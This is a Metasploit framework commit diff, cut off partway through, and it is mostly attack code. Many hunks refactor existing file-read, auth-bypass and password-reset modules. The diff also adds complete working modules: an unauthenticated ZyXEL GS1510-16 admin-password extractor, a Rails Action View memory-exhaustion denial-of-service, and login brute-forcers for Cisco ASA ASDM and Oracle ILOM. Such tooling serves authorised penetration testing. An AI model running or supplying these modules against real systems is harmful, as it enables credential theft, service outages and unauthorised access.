print_line("Usage: kill pid1 pid2 pid3 ...")
print_line("Usage: kill [pid1 [pid2 [pid3 ...]]] [-s]")
print_line("Terminate one or more processes.")
print_line(" -s : Kills the pid associated with the current session.")
end
#

46
lib/rex/text.rb
View File

@ -115,6 +115,52 @@ module Text
return hexify(str, wrap, '"', '" +', "#{name} = \n", '"')
end
#
# Creates a comma separated list of numbers
#
def self.to_num(str, wrap = DefaultWrap)
code = str.unpack('C*')
buff = ""
0.upto(code.length-1) do |byte|
if(byte % 15 == 0) and (buff.length > 0)
buff << "\r\n"
end
buff << sprintf('0x%.2x, ', code[byte])
end
# strip , at the end
buff = buff.chomp(', ')
buff << "\r\n"
return buff
end
#
# Creates a comma separated list of dwords
#
def self.to_dword(str, wrap = DefaultWrap)
code = str
alignnr = str.length % 4
if (alignnr > 0)
code << "\x00" * (4 - alignnr)
end
codevalues = Array.new
code.split("").each_slice(4) do |chars4|
chars4 = chars4.join("")
dwordvalue = chars4.unpack('*V')
codevalues.push(dwordvalue[0])
end
buff = ""
0.upto(codevalues.length-1) do |byte|
if(byte % 8 == 0) and (buff.length > 0)
buff << "\r\n"
end
buff << sprintf('0x%.8x, ', codevalues[byte])
end
# strip , at the end
buff = buff.chomp(', ')
buff << "\r\n"
return buff
end
#
# Creates a ruby-style comment
#

30
modules/auxiliary/admin/http/axigen_file_access.rb
View File

@ -51,13 +51,11 @@ class Metasploit3 < Msf::Auxiliary
end
def run
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Trying to login")
print_status("#{peer} - Trying to login")
if login
print_good("#{@peer} - Login successful")
print_good("#{peer} - Login successful")
else
print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options")
print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
return
end
@ -69,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
@traversal.gsub!(/\//, "\\")
file.gsub!(/\//, "\\")
else # unix
print_error("#{@peer} - *nix platform detected, vulnerability is only known to work on Windows")
print_error("#{peer} - *nix platform detected, vulnerability is only known to work on Windows")
return
end
@ -83,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
def read_file(file)
print_status("#{@peer} - Retrieving file contents...")
print_status("#{peer} - Retrieving file contents...")
res = send_request_cgi(
{
@ -98,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0
store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file)
print_good("#{@peer} - File successfully retrieved and saved on #{store_path}")
print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
else
print_error("#{@peer} - Failed to retrieve file")
print_error("#{peer} - Failed to retrieve file")
end
end
def delete_file(file)
print_status("#{@peer} - Deleting file #{file}")
print_status("#{peer} - Deleting file #{file}")
res = send_request_cgi(
{
@ -121,14 +119,14 @@ class Metasploit3 < Msf::Auxiliary
})
if res and res.code == 200 and res.body =~ /View Log Files/
print_good("#{@peer} - File #{file} deleted")
print_good("#{peer} - File #{file} deleted")
else
print_error("#{@peer} - Error deleting file #{file}")
print_error("#{peer} - Error deleting file #{file}")
end
end
def get_platform
print_status("#{@peer} - Retrieving platform")
print_status("#{peer} - Retrieving platform")
res = send_request_cgi(
{
@ -142,15 +140,15 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200
if res.body =~ /Windows/
print_good("#{@peer} - Windows platform found")
print_good("#{peer} - Windows platform found")
return 'windows'
elsif res.body =~ /Linux/
print_good("#{@peer} - Linux platform found")
print_good("#{peer} - Linux platform found")
return 'unix'
end
end
print_warning("#{@peer} - Platform not found, assuming UNIX flavor")
print_warning("#{peer} - Platform not found, assuming UNIX flavor")
return 'unix'
end

8
modules/auxiliary/admin/http/iis_auth_bypass.rb
View File

@ -76,19 +76,17 @@ class Metasploit3 < Msf::Auxiliary
end
def run
@peer = "#{rhost}:#{rport}"
if not has_auth
print_error("#{@peer} - No basic authentication enabled")
print_error("#{peer} - No basic authentication enabled")
return
end
bypass_string = try_auth
if bypass_string.empty?
print_error("#{@peer} - The bypass attempt did not work")
print_error("#{peer} - The bypass attempt did not work")
else
print_good("#{@peer} - You can bypass auth by doing: #{bypass_string}")
print_good("#{peer} - You can bypass auth by doing: #{bypass_string}")
end
end

21
modules/auxiliary/admin/http/intersil_pass_reset.rb
View File

@ -52,23 +52,22 @@ class Metasploit3 < Msf::Auxiliary
})
if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
print_status("#{@peer} - Boa Version Detected: #{m[1]}")
print_status("#{peer} - Boa Version Detected: #{m[1]}")
return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
return Exploit::CheckCode::Vulnerable
else
print_status("#{@peer} - Not a Boa Server!")
print_status("#{peer} - Not a Boa Server!")
return Exploit::CheckCode::Safe # not a boa server
end
rescue Rex::ConnectionRefused
print_error("#{@peer} - Connection refused by server.")
print_error("#{peer} - Connection refused by server.")
return Exploit::CheckCode::Safe
end
end
def run
@peer = "#{rhost}:#{rport}"
return if check != Exploit::CheckCode::Vulnerable
uri = normalize_uri(target_uri.path)
@ -81,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary
})
if res.nil?
print_error("#{@peer} - The server may be down")
print_error("#{peer} - The server may be down")
return
elsif res and res.code != 401
print_status("#{@peer} - #{uri} does not have basic authentication enabled")
print_status("#{peer} - #{uri} does not have basic authentication enabled")
return
end
print_status("#{@peer} - Server still operational. Checking to see if password has been overwritten")
print_status("#{peer} - Server still operational. Checking to see if password has been overwritten")
res = send_request_cgi({
'uri' => uri,
'method'=> 'GET',
@ -96,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary
})
if not res
print_error("#{@peer} - Server timedout, will not continue")
print_error("#{peer} - Server timedout, will not continue")
return
end
case res.code
when 200
print_good("#{@peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
print_good("#{peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
when 401
print_error("#{@peer} - Access forbidden. The password reset attempt did not work")
print_error("#{peer} - Access forbidden. The password reset attempt did not work")
else
print_status("#{@peer} - Unexpected response: Code #{res.code} encountered")
print_status("#{peer} - Unexpected response: Code #{res.code} encountered")
end
end

26
modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
View File

@ -51,13 +51,11 @@ class Metasploit3 < Msf::Auxiliary
end
def run
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Trying to login")
print_status("#{peer} - Trying to login")
if login
print_good("#{@peer} - Login successful")
print_good("#{peer} - Login successful")
else
print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options")
print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
return
end
@ -71,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
def read_file(file)
print_status("#{@peer} - Copying file to Web location...")
print_status("#{peer} - Copying file to Web location...")
dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/"
res = send_request_cgi(
@ -88,12 +86,12 @@ class Metasploit3 < Msf::Auxiliary
})
if res and res.code == 200 and res.body =~ /\{"success":true\}/
print_good("#{@peer} - File #{file} copied to #{dst_path} successfully")
print_good("#{peer} - File #{file} copied to #{dst_path} successfully")
else
print_error("#{@peer} - Failed to copy #{file} to #{dst_path}")
print_error("#{peer} - Failed to copy #{file} to #{dst_path}")
end
print_status("#{@peer} - Retrieving file contents...")
print_status("#{peer} - Retrieving file contents...")
res = send_request_cgi(
{
@ -103,9 +101,9 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200
store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file)
print_good("#{@peer} - File successfully retrieved and saved on #{store_path}")
print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
else
print_error("#{@peer} - Failed to retrieve file")
print_error("#{peer} - Failed to retrieve file")
end
# Cleanup
@ -113,7 +111,7 @@ class Metasploit3 < Msf::Auxiliary
end
def delete_file(file)
print_status("#{@peer} - Deleting file #{file}")
print_status("#{peer} - Deleting file #{file}")
res = send_request_cgi(
{
@ -127,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary
})
if res and res.code == 200 and res.body =~ /\{"success":true\}/
print_good("#{@peer} - File #{file} deleted")
print_good("#{peer} - File #{file} deleted")
else
print_error("#{@peer} - Error deleting file #{file}")
print_error("#{peer} - Error deleting file #{file}")
end
end

12
modules/auxiliary/admin/http/rails_devise_pass_reset.rb
View File

@ -52,6 +52,7 @@ class Metasploit3 < Msf::Auxiliary
[
OptString.new('TARGETURI', [ true, 'The request URI', '/users/password']),
OptString.new('TARGETEMAIL', [true, 'The email address of target account']),
OptString.new('OBJECTNAME', [true, 'The user object name', 'user']),
OptString.new('PASSWORD', [true, 'The password to set']),
OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]),
OptInt.new('MAXINT', [true, 'Max integer to try (tokens begining with a higher int will fail)', 10])
@ -61,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
def generate_token(account)
# CSRF token from GET "/users/password/new" isn't actually validated it seems.
postdata="user[email]=#{account}"
postdata="#{datastore['OBJECTNAME']}[email]=#{account}"
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']),
@ -100,11 +101,11 @@ class Metasploit3 < Msf::Auxiliary
encode_pass = REXML::Text.new(password).to_s
xml = ""
xml << "<user>"
xml << "<#{datastore['OBJECTNAME']}>"
xml << "<password>#{encode_pass}</password>"
xml << "<password_confirmation>#{encode_pass}</password_confirmation>"
xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>"
xml << "</user>"
xml << "</#{datastore['OBJECTNAME']}>"
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']),
@ -144,9 +145,10 @@ class Metasploit3 < Msf::Auxiliary
def run
# Clear outstanding reset tokens, helps ensure we hit the intended account.
if datastore['FLUSHTOKENS']
print_status("Clearing existing tokens...")
clear_tokens() if datastore['FLUSHTOKENS']
clear_tokens()
end
# Generate a token for our account
print_status("Generating reset token for #{datastore['TARGETEMAIL']}...")
status = generate_token(datastore['TARGETEMAIL'])

14
modules/auxiliary/admin/http/sophos_wpa_traversal.rb
View File

@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
travs << file
travs << "%00"
print_status("#{@peer} - Retrieving file contents...")
print_status("#{peer} - Retrieving file contents...")
res = send_request_cgi(
{
@ -95,19 +95,17 @@ class Metasploit3 < Msf::Auxiliary
end
def run
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
print_status("#{peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
if is_proficy?
print_good("#{@peer} - Check successful")
print_good("#{peer} - Check successful")
else
print_error("#{@peer} - Sophos Web Protect Appliance vulnerable component not found")
print_error("#{peer} - Sophos Web Protect Appliance vulnerable component not found")
return
end
contents = read_file(datastore['FILEPATH'])
if contents.nil?
print_error("#{@peer} - File not downloaded")
print_error("#{peer} - File not downloaded")
return
end
@ -119,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary
contents,
file_name
)
print_good("#{rhost}:#{rport} - File saved in: #{path}")
print_good("#{peer} - File saved in: #{path}")
end

79
modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb Normal file
View File

@ -0,0 +1,79 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'ZyXEL GS1510-16 Password Extractor',
'Description' => %q{
This module exploits a vulnerability in ZyXEL GS1510-16 routers
to extract the admin password. Due to a lack of authentication on the
webctrl.cgi script, unauthenticated attackers can recover the
administrator password for these devices. The vulnerable device
has reached end of life for support from the manufacturer, so it is
unlikely this problem will be addressed.
},
'References' =>
[
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2709' ]
],
'Author' => [
'Daniel Manser', # @antsygeek
'Sven Vetsch' # @disenchant_ch
],
'License' => MSF_LICENSE
)
end
def run
begin
print_status("Trying to get 'admin' user password ...")
res = send_request_cgi({
'uri' => "/webctrl.cgi",
'method' => 'POST',
'vars_post' => {
'username' => "admin",
'password' => "#{Rex::Text.rand_text_alphanumeric(rand(4)+4)}",
'action' => "cgi_login"
}
}, 10)
if (res && res.code == 200)
print_status("Got response from router.")
else
print_error('Unexpected HTTP response code.')
return
end
admin_password = ""
admin_password_matches = res.body.match(/show_user\(1,"admin","(.+)"/);
if not admin_password_matches
print_error('Could not obtain admin password')
return
else
admin_password = admin_password_matches[1];
print_good("Password for user 'admin' is: #{admin_password}")
report_auth_info(
:host => rhost,
:port => rport,
:sname => "ZyXEL GS1510-16",
:user => 'admin',
:pass => admin_password,
:active => true
)
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Failed to connect")
return
end
end
end

120
modules/auxiliary/dos/http/rails_action_view.rb Normal file
View File

@ -0,0 +1,120 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby-on-Rails Action View MIME Memory Exhaustion',
'Description' => %q{
This module exploits a Denial of Service (DoS) condition in Action View that requires
a controller action. By sending a specially crafted content-type header to a rails
application, it is possible for it to store the invalid MIME type, and may eventually
consumes all memory if enough invalid MIMEs are given.
Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.
},
'Author' =>
[
'Toby Hsieh', # Reported the issue
'joev', # Metasploit
'sinn3r' # Metasploit
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-6414' ],
[ 'OSVDB', '100525' ],
[ 'BID', '64074' ],
[ 'URL', 'http://seclists.org/oss-sec/2013/q4/400' ],
[ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]
],
'DisclosureDate' => 'Dec 04 2013'))
register_options(
[
Opt::RPORT(80),
OptString.new('URIPATH', [true, 'The URI that routes to a Rails controller action', '/']),
OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]),
OptInt.new('REQCOUNT', [true, 'Number of HTTP requests to pipeline per connection', 1]),
OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])
],
self.class)
end
def host
host = datastore['RHOST']
host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
host
end
def long_string
Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])
end
#
# Returns a modified version of the URI that:
# 1. Always has a starting slash
# 2. Removes all the double slashes
#
def normalize_uri(*strs)
new_str = strs * "/"
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str.start_with?("/")
new_str = '/' + new_str
end
new_str
end
def http_request
uri = normalize_uri(datastore['URIPATH'])
http = ''
http << "GET #{uri} HTTP/1.1\r\n"
http << "Host: #{host}\r\n"
http << "Accept: #{long_string}\r\n"
http << "\r\n"
http
end
def run
begin
print_status("Stressing the target memory, this will take quite some time...")
datastore['RLIMIT'].times { |i|
connect
datastore['REQCOUNT'].times { sock.put(http_request) }
disconnect
}
print_status("Attack finished. Either the server isn't vulnerable, or please dos harder.")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Unable to connect to #{host}.")
rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached.")
ensure
disconnect
end
end
end
=begin
Reproduce:
1. Add a def index; end to ApplicationController
2. Add an empty index.html.erb file to app/views/application/index.html.erb
3. Uncomment the last line in routes.rb
4. Hit /application
=end

138
modules/auxiliary/scanner/http/cisco_asa_asdm.rb Normal file
View File

@ -0,0 +1,138 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Cisco ASA ASDM Bruteforce Login Utility',
'Description' => %{
This module scans for Cisco ASA ASDM web login portals and
performs login brute force to identify valid credentials.
},
'Author' =>
[
'Jonathan Claudius <jclaudius[at]trustwave.com>',
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),
OptString.new('USERNAME', [true, "A specific username to authenticate as", 'cisco']),
OptString.new('PASSWORD', [true, "A specific password to authenticate with", 'cisco'])
], self.class)
end
def run_host(ip)
unless check_conn?
print_error("#{peer} - Connection failed, Aborting...")
return
end
unless is_app_asdm?
print_error("#{peer} - Application does not appear to be Cisco ASA ASDM. Module will not continue.")
return
end
print_status("#{peer} - Application appears to be Cisco ASA ASDM. Module will continue.")
print_status("#{peer} - Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
# Verify whether the connection is working or not
def check_conn?
begin
res = send_request_cgi(
{
'uri' => '/',
'method' => 'GET'
})
print_good("#{peer} - Server is responsive...")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
return
end
end
# Verify whether we're working with ASDM or not
def is_app_asdm?
res = send_request_cgi(
{
'uri' => '/+webvpn+/index.html',
'method' => 'GET',
'agent' => 'ASDM/ Java/1.6.0_65'
})
if res &&
res.code == 200 &&
res.headers['Set-Cookie'].match(/webvpn/)
return true
else
return false
end
end
# Brute-force the login page
def do_login(user, pass)
vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi({
'uri' => '/+webvpn+/index.html',
'method' => 'POST',
'agent' => 'ASDM/ Java/1.6.0_65',
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
'cookie' => 'webvpnlogin=1; tg=0DefaultADMINGroup',
'vars_post' => {
'username' => user,
'password' => pass,
'tgroup' => 'DefaultADMINGroup'
}
})
if res &&
res.code == 200 &&
res.body.match(/SSL VPN Service/) &&
res.body.match(/Success/) &&
res.body.match(/success/)
print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_hash = {
:host => rhost,
:port => rport,
:sname => 'Cisco ASA ASDM',
:user => user,
:pass => pass,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{peer} - HTTP Connection Failed, Aborting")
return :abort
end
end
end

17
modules/auxiliary/scanner/http/dolibarr_login.rb
View File

@ -62,11 +62,11 @@ class Metasploit3 < Msf::Auxiliary
#
sid, token = get_sid_token
if sid.nil? or token.nil?
print_error("#{@peer} - Unable to obtain session ID or token, cannot continue")
print_error("#{peer} - Unable to obtain session ID or token, cannot continue")
return :abort
else
vprint_status("#{@peer} - Using sessiond ID: #{sid}")
vprint_status("#{@peer} - Using token: #{token}")
vprint_status("#{peer} - Using sessiond ID: #{sid}")
vprint_status("#{peer} - Using token: #{token}")
end
begin
@ -86,18 +86,18 @@ class Metasploit3 < Msf::Auxiliary
}
})
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
vprint_error("#{@peer} - Service failed to respond")
vprint_error("#{peer} - Service failed to respond")
return :abort
end
if res.nil?
print_error("#{@peer} - Connection timed out")
print_error("#{peer} - Connection timed out")
return :abort
end
location = res.headers['Location']
if res and res.headers and (location = res.headers['Location']) and location =~ /admin\//
print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"")
print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({
:host => rhost,
:port => rport,
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary
})
return :next_user
else
vprint_error("#{@peer} - Bad login: \"#{user}:#{pass}\"")
vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"")
return
end
end
@ -117,10 +117,9 @@ class Metasploit3 < Msf::Auxiliary
def run
@uri = target_uri.path
@uri.path << "/" if @uri.path[-1, 1] != "/"
@peer = "#{rhost}:#{rport}"
each_user_pass { |user, pass|
vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"")
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass)
}
end

21
modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb
View File

@ -47,18 +47,17 @@ class Metasploit4 < Msf::Auxiliary
end
def run_host(ip)
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
print_status("#{peer} - Connecting to SiteScope SOAP Interface")
res = send_request_cgi({
'uri' => "#{@uri}services/APISiteScopeImpl",
'method' => 'GET'})
if not res
print_error("#{@peer} - Unable to connect")
print_error("#{peer} - Unable to connect")
return
end
@ -66,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary
end
def accessfile
print_status("#{@peer} - Retrieving the target hostname")
print_status("#{peer} - Retrieving the target hostname")
data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
data << "<wsns0:Envelope" + "\r\n"
@ -108,11 +107,11 @@ class Metasploit4 < Msf::Auxiliary
end
if not host_name or host_name.empty?
print_error("#{@peer} - Failed to retrieve the host name")
print_error("#{peer} - Failed to retrieve the host name")
return
end
print_status("#{@peer} - Retrieving the file contents")
print_status("#{peer} - Retrieving the file contents")
data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
data << "<wsns0:Envelope" + "\r\n"
@ -153,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary
boundary = $1
end
if not boundary or boundary.empty?
print_error("#{@peer} - Failed to retrieve the file contents")
print_error("#{peer} - Failed to retrieve the file contents")
return
end
@ -161,7 +160,7 @@ class Metasploit4 < Msf::Auxiliary
cid = $1
end
if not cid or cid.empty?
print_error("#{@peer} - Failed to retrieve the file contents")
print_error("#{peer} - Failed to retrieve the file contents")
return
end
@ -169,17 +168,17 @@ class Metasploit4 < Msf::Auxiliary
loot = Rex::Text.ungzip($1)
end
if not loot or loot.empty?
print_error("#{@peer} - Failed to retrieve the file contents")
print_error("#{peer} - Failed to retrieve the file contents")
return
end
f = ::File.basename(datastore['RFILE'])
path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_status("#{@peer} - #{datastore['RFILE']} saved in #{path}")
print_status("#{peer} - #{datastore['RFILE']} saved in #{path}")
return
end
print_error("#{@peer} - Failed to retrieve the file contents")
print_error("#{peer} - Failed to retrieve the file contents")
end
end

19
modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
View File

@ -48,11 +48,10 @@ class Metasploit4 < Msf::Auxiliary
end
def run_host(ip)
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
print_status("#{peer} - Connecting to SiteScope SOAP Interface")
uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
@ -61,7 +60,7 @@ class Metasploit4 < Msf::Auxiliary
'method' => 'GET'})
if not res
print_error("#{@peer} - Unable to connect")
print_error("#{peer} - Unable to connect")
return
end
@ -85,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary
data << "</wsns0:Body>" + "\r\n"
data << "</wsns0:Envelope>"
print_status("#{@peer} - Retrieving the SiteScope Configuration")
print_status("#{peer} - Retrieving the SiteScope Configuration")
uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
@ -104,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary
boundary = $1
end
if not boundary or boundary.empty?
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
return
end
@ -112,7 +111,7 @@ class Metasploit4 < Msf::Auxiliary
cid = $1
end
if not cid or cid.empty?
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
return
end
@ -120,17 +119,17 @@ class Metasploit4 < Msf::Auxiliary
loot = Rex::Text.ungzip($1)
end
if not loot or loot.empty?
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
return
end
path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration")
print_status("#{@peer} - HP SiteScope Configuration saved in #{path}")
print_status("#{@peer} - HP SiteScope Configuration is saved as Java serialization data")
print_status("#{peer} - HP SiteScope Configuration saved in #{path}")
print_status("#{peer} - HP SiteScope Configuration is saved as Java serialization data")
return
end
print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
end
end

13
modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb
View File

@ -47,11 +47,10 @@ class Metasploit4 < Msf::Auxiliary
end
def run_host(ip)
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
print_status("#{peer} - Connecting to SiteScope SOAP Interface")
uri = normalize_uri(@uri, 'services/APIMonitorImpl')
@ -60,7 +59,7 @@ class Metasploit4 < Msf::Auxiliary
'method' => 'GET'})
if not res
print_error("#{@peer} - Unable to connect")
print_error("#{peer} - Unable to connect")
return
end
@ -89,7 +88,7 @@ class Metasploit4 < Msf::Auxiliary
data << "</wsns0:Body>" + "\r\n"
data << "</wsns0:Envelope>" + "\r\n"
print_status("#{@peer} - Retrieving the file contents")
print_status("#{peer} - Retrieving the file contents")
uri = normalize_uri(@uri, 'services/APIMonitorImpl')
@ -105,16 +104,16 @@ class Metasploit4 < Msf::Auxiliary
if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m
loot = CGI.unescapeHTML($1)
if not loot or loot.empty?
print_status("#{@peer} - Retrieved empty file")
print_status("#{peer} - Retrieved empty file")
return
end
f = ::File.basename(datastore['RFILE'])
path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_status("#{@peer} - #{datastore['RFILE']} saved in #{path}")
print_status("#{peer} - #{datastore['RFILE']} saved in #{path}")
return
end
print_error("#{@peer} - Failed to retrieve the file")
print_error("#{peer} - Failed to retrieve the file")
end
end

4
modules/auxiliary/scanner/http/openmind_messageos_login.rb
View File

@ -16,8 +16,8 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'OpenMind Message-OS Portal Login Brute Force Utility',
'Description' => %{
This module scans for OpenMind Message-OS provisioning web login portal, and performs login brute force
to identify valid credentials.
This module scans for OpenMind Message-OS provisioning web login portal, and
performs a login brute force attack to identify valid credentials.
},
'Author' =>
[

115
modules/auxiliary/scanner/http/oracle_ilom_login.rb Normal file
View File

@ -0,0 +1,115 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle ILO Manager Login Brute Force Utility',
'Description' => %{
This module scans for Oracle Integrated Lights Out Manager (ILO) login portal, and
performs a login brute force attack to identify valid credentials.
},
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'SSL' => true }
))
register_options(
[
Opt::RPORT(443)
], self.class)
end
def run_host(ip)
unless is_app_oilom?
return
end
print_status("#{peer} - Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
#
# What's the point of running this module if the target actually isn't Oracle ILOM
#
def is_app_oilom?
begin
res = send_request_cgi(
{
'uri' => '/iPages/i_login.asp',
'method' => 'GET'
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
vprint_error("#{peer} - HTTP Connection Failed...")
return false
end
if (res and res.code == 200 and res.headers['Server'].include?("Oracle-ILOM-Web-Server") and res.body.include?("Integrated Lights Out Manager"))
vprint_good("#{peer} - Running Oracle Integrated Lights Out Manager portal...")
return true
else
vprint_error("#{peer} - Application is not Oracle ILOM. Module will not continue.")
return false
end
end
#
# Brute-force the login page
#
def do_login(user, pass)
vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi(
{
'uri' => '/iPages/loginProcessor.asp',
'method' => 'POST',
'vars_post' =>
{
'sclink' => '',
'username' => user,
'password' => pass,
'button' => 'Log+In'
}
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
vprint_error("#{peer} - HTTP Connection Failed...")
return :abort
end
if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") and res.body.include?("SetWebSessionString"))
print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_hash = {
:host => rhost,
